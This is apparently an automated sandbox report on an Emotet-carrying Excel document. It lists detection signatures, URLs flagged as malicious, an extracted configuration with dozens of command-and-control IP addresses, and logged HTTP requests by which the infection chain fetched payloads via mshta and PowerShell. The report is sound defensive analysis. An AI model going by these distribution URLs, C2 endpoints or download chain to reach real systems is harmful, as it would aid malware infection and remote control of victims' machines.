Windows Analysis Report
imedpub_2.xls

Overview

General Information

Sample Name: imedpub_2.xls
Analysis ID: 562406
MD5: 9152f953f0fb28e90fc2cdaa4dc8c6ce
SHA1: e82a389da3baa5a094df5ecc49ac23aa951466d8
SHA256: 131c6cbabbaa04e8953a7647ed6a2245a415ff9a2fdd63620bdb9cdc29c479d4
Tags: SilentBuilderxls
Infos:

Detection

Hidden Macro 4.0 Emotet
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Uses insecure TLS / SSL version for HTTPS connection
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: https://haileywells.com/cgi-bin/KJUOaq/PE3 Avira URL Cloud: Label: malware
Source: http://praachichemfood.com/wp-content/themes/brooklyn/images/default/fav-114.png Avira URL Cloud: Label: malware
Source: https://onewaymedia.ro/wp-includ Avira URL Cloud: Label: malware
Source: https://lodev7.com/wp-content/dp Avira URL Cloud: Label: malware
Source: http://praachichemfood.com/public_html/SWmteCWBUkA89/PE3 Avira URL Cloud: Label: malware
Source: http://www.praachichemfood.com/wp-content/themes/brooklyn/css/ut.theme.min.css?ver=4.9.7.2 Avira URL Cloud: Label: malware
Source: https://www.praachichemfood.com/wp-json/ Avira URL Cloud: Label: malware
Source: http://bakultante.com/tee5oeot/Q Avira URL Cloud: Label: malware
Source: http://praachichemfood.com/wp-content/themes/brooklyn/images/default/fav-57.png Avira URL Cloud: Label: malware
Source: https://dtmconsulting.ca/wp-includes/dkCFwyE/ Avira URL Cloud: Label: malware
Source: http://praachichemfood.com/wp-content/themes/brooklyn/images/default/fav-32.png Avira URL Cloud: Label: malware
Source: https://onewaymedia.ro/wp-includes/k/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.168/zqqw/zaas/fe.htmlW59wo Avira URL Cloud: Label: malware
Source: http://praachichemfood.com/public_html/SWmteCWBUkA89/ Avira URL Cloud: Label: malware
Source: https://trochoi80club.com/wp-content/6shnRU/ Avira URL Cloud: Label: malware
Source: http://www.praachichemfood.com Avira URL Cloud: Label: malware
Source: https://www.yepproject.org/wp-in Avira URL Cloud: Label: malware
Source: http://www.praachichemfood.com/wp-content/themes/brooklyn/js/ut-scriptlibrary.min.js?ver=4.9.7.2 Avira URL Cloud: Label: malware
Source: http://www.praachichemfood.com/wp-content/themes/brooklyn/css/ut.core.plugins.min.css?ver=5.9 Avira URL Cloud: Label: malware
Source: http://praachichemfood.com/publi Avira URL Cloud: Label: malware
Source: http://91.240.118.168/zqqw/zaas/ Avira URL Cloud: Label: malware
Source: http://estiloindustria.com.br/wp-content/49cRLeDYqr6uVF7i/ Avira URL Cloud: Label: malware
Source: http://91.240.118.168/zqqw/zaas/fe.png Avira URL Cloud: Label: malware
Source: http://estiloindustria.com.br/wp Avira URL Cloud: Label: malware
Source: https://dtmconsulting.ca Avira URL Cloud: Label: malware
Source: http://91.240.118.168/zqqw/zaas/fe.pngPE3 Avira URL Cloud: Label: malware
Source: https://worldaviationhub.com/wp- Avira URL Cloud: Label: malware
Source: https://worldaviationhub.com/wp-includes/Lik/PE3 Avira URL Cloud: Label: malware
Source: https://dtmconsulting.ca/wp-includes/dkCFwyE/PE3 Avira URL Cloud: Label: malware
Source: http://www.praachichemfood.com/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=6.5 Avira URL Cloud: Label: malware
Source: https://www.praachichemfood.com/feed/ Avira URL Cloud: Label: malware
Source: http://www.praachichemfood.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.5.4 Avira URL Cloud: Label: malware
Source: https://futurelube.com/wp-admin/ Avira URL Cloud: Label: malware
Source: http://91.240.118.168/zqqw/zaas/fe.htmlE59em Avira URL Cloud: Label: malware
Source: http://91.240.118.168/zqqw/zaas/fe.html Avira URL Cloud: Label: malware
Source: http://91.240.118.168/zqqw/zaas/fe.htmlEL Avira URL Cloud: Label: malware
Source: https://worldaviationhub.com/wp-includes/Lik/ Avira URL Cloud: Label: malware
Source: http://www.praachichemfood.com/xmlrpc.php Avira URL Cloud: Label: malware
Source: http://www.praachichemfood.com/wp-content/plugins/ut-shortcodes/js/plugins/modernizr/modernizr.min.j Avira URL Cloud: Label: malware
Source: https://futurelube.com/wp-admin/6GLpl4ehsdCBX3z/ Avira URL Cloud: Label: malware
Source: http://www.praachichemfood.com/wp-content/plugins/mystickyelements/css/mystickyelements-front.min.cs Avira URL Cloud: Label: malware
Source: https://trochoi80club.com/wp-content/6shnRU/PE3 Avira URL Cloud: Label: malware
Source: https://mortgageadviser.directory/xw8ok/icCYdBSpbFrf5s/ Avira URL Cloud: Label: malware
Source: https://trochoi80club.com/wp-con Avira URL Cloud: Label: malware
Source: http://www.praachichemfood.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2 Avira URL Cloud: Label: malware
Source: http://bakultante.com/tee5oeot/Q/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.168/zqqw/zaas/fe.htmlP41yl Avira URL Cloud: Label: malware
Source: https://lodev7.com/wp-content/dpwjiJivrpgO1F2/ Avira URL Cloud: Label: malware
Source: http://91.240.118.168/zqqw/zaas/fe.htmlN Avira URL Cloud: Label: malware
Source: http://91.240.118.168/zqqw/zaas/fe.htmlWinSta0 Avira URL Cloud: Label: malware
Source: http://www.praachichemfood.com/wp-content/themes/brooklyn/css/ut.core.fonts.min.css?ver=5.9 Avira URL Cloud: Label: malware
Source: http://www.praachichemfood.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.0 Avira URL Cloud: Label: malware
Source: https://futurelube.com/wp-admin/6GLpl4ehsdCBX3z/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.168/zqqw/zaas/fe.htmlB Avira URL Cloud: Label: malware
Source: https://haileywells.com/cgi-bin/KJUOaq/ Avira URL Cloud: Label: malware
Source: https://www.yepproject.org/wp-includes/lC45zFsHmmsMDElKT/ Avira URL Cloud: Label: malware
Source: http://estiloindustria.com.br/wp-content/49cRLeDYqr6uVF7i/PE3 Avira URL Cloud: Label: malware
Source: http://91.240.118.168/zqqw/zaas/fe.htmlP Avira URL Cloud: Label: malware
Source: https://haileywells.com/cgi-bin/ Avira URL Cloud: Label: malware
Source: http://www.praachichemfood.com/wp-includes/wlwmanifest.xml Avira URL Cloud: Label: malware
Source: https://www.praachichemfood.com/comments/feed/ Avira URL Cloud: Label: malware
Source: http://praachichemfood.com/wp-content/themes/brooklyn/images/default/fav-144.png Avira URL Cloud: Label: malware
Source: https://dtmconsulting.ca/wp-incl Avira URL Cloud: Label: malware
Source: http://www.praachichemfood.com/wp-content/themes/brooklyn/style.css?ver=4.9.7.2 Avira URL Cloud: Label: malware
Source: http://91.240.118.168/zqqw/zaas/fe.htmlHEAP_SIGNATURE4 Avira URL Cloud: Label: malware
Source: http://91.240.118.168/zqqw/zaas/fe.htmlmshta Avira URL Cloud: Label: malware
Source: http://bakultante.com/tee5oeot/Q/ Avira URL Cloud: Label: malware
Source: https://www.yepproject.org/wp-includes/lC45zFsHmmsMDElKT/PE3 Avira URL Cloud: Label: malware
Source: https://www.praachichemfood.com/xmlrpc.php?rsd Avira URL Cloud: Label: malware
Source: https://onewaymedia.ro/wp-includes/k/ Avira URL Cloud: Label: malware
Source: http://91.240.118.168/zqqw/zaas/fe.html.0 Avira URL Cloud: Label: malware
Source: https://mortgageadviser.directory/xw8ok/icCYdBSpbFrf5s/PE3 Avira URL Cloud: Label: malware
Source: http://praachichemfood.com Avira URL Cloud: Label: malware
Source: http://www.praachichemfood.com/wp-content/themes/brooklyn/css/ut.shortcode.min.css?ver=5.9 Avira URL Cloud: Label: malware
Source: http://www.praachichemfood.com/wp-content/themes/brooklyn/css/ut.vc.shortcodes.min.css?ver=5.9 Avira URL Cloud: Label: malware
Source: http://91.240.118.168/zqqw/zaas/fe.htmlhttp://91.240.118.168/zqqw/zaas/fe.html Avira URL Cloud: Label: malware
Source: http://91.240.118.168 URL Reputation: Label: malware
Source: https://lodev7.com/wp-content/dpwjiJivrpgO1F2/PE3 Avira URL Cloud: Label: malware
Source: http://praachichemfood.com/wp-content/themes/brooklyn/images/default/fav-72.png Avira URL Cloud: Label: malware
Source: http://www.praachichemfood.com/wp-content/plugins/mystickyelements/css/font-awesome.min.css?ver=2.0. Avira URL Cloud: Label: malware
Source: http://91.240.118.168/zqqw/zaas/fe.htmlfunction Avira URL Cloud: Label: malware
Found malware configuration
Source: 10.2.rundll32.exe.140000.0.raw.unpack Malware Configuration Extractor: Emotet {"C2 list": ["160.16.102.168:80", "131.100.24.231:80", "200.17.134.35:7080", "207.38.84.195:8080", "212.237.56.116:7080", "58.227.42.236:80", "104.251.214.46:8080", "158.69.222.101:443", "192.254.71.210:443", "46.55.222.11:443", "45.118.135.203:7080", "107.182.225.142:8080", "103.75.201.2:443", "104.168.155.129:8080", "195.154.133.20:443", "159.8.59.82:8080", "110.232.117.186:8080", "45.142.114.231:8080", "41.76.108.46:8080", "203.114.109.124:443", "50.116.54.215:443", "209.59.138.75:7080", "185.157.82.211:8080", "164.68.99.3:8080", "162.214.50.39:7080", "138.185.72.26:8080", "178.63.25.185:443", "51.15.4.22:443", "81.0.236.90:443", "216.158.226.206:443", "45.176.232.124:443", "162.243.175.63:443", "212.237.17.99:8080", "45.118.115.99:8080", "129.232.188.93:443", "173.214.173.220:8080", "178.79.147.66:8080", "176.104.106.96:8080", "51.38.71.0:443", "173.212.193.249:8080", "217.182.143.207:443", "212.24.98.99:8080", "159.89.230.105:443", "79.172.212.216:8080", "212.237.5.209:443"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}
Multi AV Scanner detection for submitted file
Source: imedpub_2.xls ReversingLabs: Detection: 27%
Machine Learning detection for dropped file
Source: C:\ProgramData\QWER.dll Joe Sandbox ML: detected

Compliance
barindex
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 162.241.211.118:443 -> 192.168.2.22:49169 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: >ystem.pdb source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdbG source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.675448528.00000000029F7000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 9_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 11_2_10021854

Software Vulnerabilities
barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.22:49165 -> 91.240.118.168:80
Potential document exploit detected (performs DNS queries)
Source: global traffic DNS query: name: praachichemfood.com
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.22:49169 -> 162.241.211.118:443

Networking
barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2034631 ET TROJAN Maldoc Activity (set) 192.168.2.22:49166 -> 91.240.118.168:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor IPs: 160.16.102.168:80
Source: Malware configuration extractor IPs: 131.100.24.231:80
Source: Malware configuration extractor IPs: 200.17.134.35:7080
Source: Malware configuration extractor IPs: 207.38.84.195:8080
Source: Malware configuration extractor IPs: 212.237.56.116:7080
Source: Malware configuration extractor IPs: 58.227.42.236:80
Source: Malware configuration extractor IPs: 104.251.214.46:8080
Source: Malware configuration extractor IPs: 158.69.222.101:443
Source: Malware configuration extractor IPs: 192.254.71.210:443
Source: Malware configuration extractor IPs: 46.55.222.11:443
Source: Malware configuration extractor IPs: 45.118.135.203:7080
Source: Malware configuration extractor IPs: 107.182.225.142:8080
Source: Malware configuration extractor IPs: 103.75.201.2:443
Source: Malware configuration extractor IPs: 104.168.155.129:8080
Source: Malware configuration extractor IPs: 195.154.133.20:443
Source: Malware configuration extractor IPs: 159.8.59.82:8080
Source: Malware configuration extractor IPs: 110.232.117.186:8080
Source: Malware configuration extractor IPs: 45.142.114.231:8080
Source: Malware configuration extractor IPs: 41.76.108.46:8080
Source: Malware configuration extractor IPs: 203.114.109.124:443
Source: Malware configuration extractor IPs: 50.116.54.215:443
Source: Malware configuration extractor IPs: 209.59.138.75:7080
Source: Malware configuration extractor IPs: 185.157.82.211:8080
Source: Malware configuration extractor IPs: 164.68.99.3:8080
Source: Malware configuration extractor IPs: 162.214.50.39:7080
Source: Malware configuration extractor IPs: 138.185.72.26:8080
Source: Malware configuration extractor IPs: 178.63.25.185:443
Source: Malware configuration extractor IPs: 51.15.4.22:443
Source: Malware configuration extractor IPs: 81.0.236.90:443
Source: Malware configuration extractor IPs: 216.158.226.206:443
Source: Malware configuration extractor IPs: 45.176.232.124:443
Source: Malware configuration extractor IPs: 162.243.175.63:443
Source: Malware configuration extractor IPs: 212.237.17.99:8080
Source: Malware configuration extractor IPs: 45.118.115.99:8080
Source: Malware configuration extractor IPs: 129.232.188.93:443
Source: Malware configuration extractor IPs: 173.214.173.220:8080
Source: Malware configuration extractor IPs: 178.79.147.66:8080
Source: Malware configuration extractor IPs: 176.104.106.96:8080
Source: Malware configuration extractor IPs: 51.38.71.0:443
Source: Malware configuration extractor IPs: 173.212.193.249:8080
Source: Malware configuration extractor IPs: 217.182.143.207:443
Source: Malware configuration extractor IPs: 212.24.98.99:8080
Source: Malware configuration extractor IPs: 159.89.230.105:443
Source: Malware configuration extractor IPs: 79.172.212.216:8080
Source: Malware configuration extractor IPs: 212.237.5.209:443
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /wp-includes/dkCFwyE/ HTTP/1.1Host: dtmconsulting.caConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /zqqw/zaas/fe.png HTTP/1.1Host: 91.240.118.168Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /public_html/SWmteCWBUkA89/ HTTP/1.1Host: praachichemfood.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /public_html/SWmteCWBUkA89/ HTTP/1.1Host: www.praachichemfood.comConnection: Keep-Alive
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 162.241.211.118:443 -> 192.168.2.22:49169 version: TLS 1.0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /zqqw/zaas/fe.html HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 91.240.118.168Connection: Keep-Alive
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: OnlineSASFR OnlineSASFR
Source: Joe Sandbox View ASN Name: S-NET-ASPL S-NET-ASPL
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 195.154.133.20 195.154.133.20
Source: Joe Sandbox View IP Address: 185.157.82.211 185.157.82.211
Connects to several IPs in different countries
Source: unknown Network traffic detected: IP country count 22
Source: powershell.exe, 00000006.00000002.679858530.000000000352E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.11
Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.679858530.000000000352E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168
Source: powershell.exe, 00000006.00000002.679858530.000000000352E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/zqqw/zaas/
Source: mshta.exe, 00000004.00000002.440943084.0000000000336000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.441121111.000000000051C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/zqqw/zaas/fe.html
Source: mshta.exe, 00000004.00000002.441392938.00000000032FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/zqqw/zaas/fe.html.0
Source: imedpub_2.xls.0.dr String found in binary or memory: http://91.240.118.168/zqqw/zaas/fe.htmlB
Source: mshta.exe, 00000004.00000002.441078405.00000000004CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/zqqw/zaas/fe.htmlE59em
Source: mshta.exe, 00000004.00000002.441392938.00000000032FF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/zqqw/zaas/fe.htmlEL
Source: mshta.exe, 00000004.00000002.440901848.0000000000190000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/zqqw/zaas/fe.htmlHEAP_SIGNATURE4
Source: mshta.exe, 00000004.00000002.441078405.00000000004CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/zqqw/zaas/fe.htmlN
Source: mshta.exe, 00000004.00000002.441078405.00000000004CE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/zqqw/zaas/fe.htmlP
Source: mshta.exe, 00000004.00000003.419347638.00000000004FC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/zqqw/zaas/fe.htmlP41yl
Source: mshta.exe, 00000004.00000002.441061967.0000000000490000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/zqqw/zaas/fe.htmlW59wo
Source: mshta.exe, 00000004.00000002.441061967.0000000000490000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/zqqw/zaas/fe.htmlWinSta0
Source: mshta.exe, 00000004.00000003.421233616.0000000001F8D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/zqqw/zaas/fe.htmlfunction
Source: mshta.exe, 00000004.00000003.421019651.0000000001F85000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/zqqw/zaas/fe.htmlhttp://91.240.118.168/zqqw/zaas/fe.html
Source: mshta.exe, 00000004.00000002.441061967.0000000000490000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/zqqw/zaas/fe.htmlmshta
Source: powershell.exe, 00000006.00000002.679858530.000000000352E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/zqqw/zaas/fe.png
Source: powershell.exe, 00000006.00000002.679858530.000000000352E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://91.240.118.168/zqqw/zaas/fe.pngPE3
Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bakultante.com/tee5oeot/Q
Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bakultante.com/tee5oeot/Q/
Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bakultante.com/tee5oeot/Q/PE3
Source: powershell.exe, 00000006.00000002.675532532.0000000002A47000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.675478649.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.675599563.0000000002A7E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000006.00000002.675599563.0000000002A7E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000006.00000002.675599563.0000000002A7E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000006.00000002.675599563.0000000002A7E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000006.00000002.675599563.0000000002A7E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000006.00000002.675599563.0000000002A7E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://estiloindustria.com.br/wp
Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://estiloindustria.com.br/wp-content/49cRLeDYqr6uVF7i/
Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://estiloindustria.com.br/wp-content/49cRLeDYqr6uVF7i/PE3
Source: powershell.exe, 00000006.00000002.675599563.0000000002A7E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000006.00000002.675599563.0000000002A7E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000006.00000002.675532532.0000000002A47000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000006.00000002.675532532.0000000002A47000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.675478649.0000000002A00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000006.00000002.675599563.0000000002A7E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000006.00000002.675599563.0000000002A7E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000006.00000002.675599563.0000000002A7E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://praachichemfood.com
Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://praachichemfood.com/publi
Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://praachichemfood.com/public_html/SWmteCWBUkA89/
Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://praachichemfood.com/public_html/SWmteCWBUkA89/PE3
Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://praachichemfood.com/wp-content/themes/brooklyn/images/default/fav-114.png
Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://praachichemfood.com/wp-content/themes/brooklyn/images/default/fav-144.png
Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://praachichemfood.com/wp-content/themes/brooklyn/images/default/fav-32.png
Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://praachichemfood.com/wp-content/themes/brooklyn/images/default/fav-57.png
Source: powershell.exe, 00000006.00000002.680127578.0000000003686000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://praachichemfood.com/wp-content/themes/brooklyn/images/default/fav-72.png
Source: powershell.exe, 00000006.00000002.675599563.0000000002A7E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000006.00000002.675599563.0000000002A7E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000006.00000002.674855596.000000000013E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
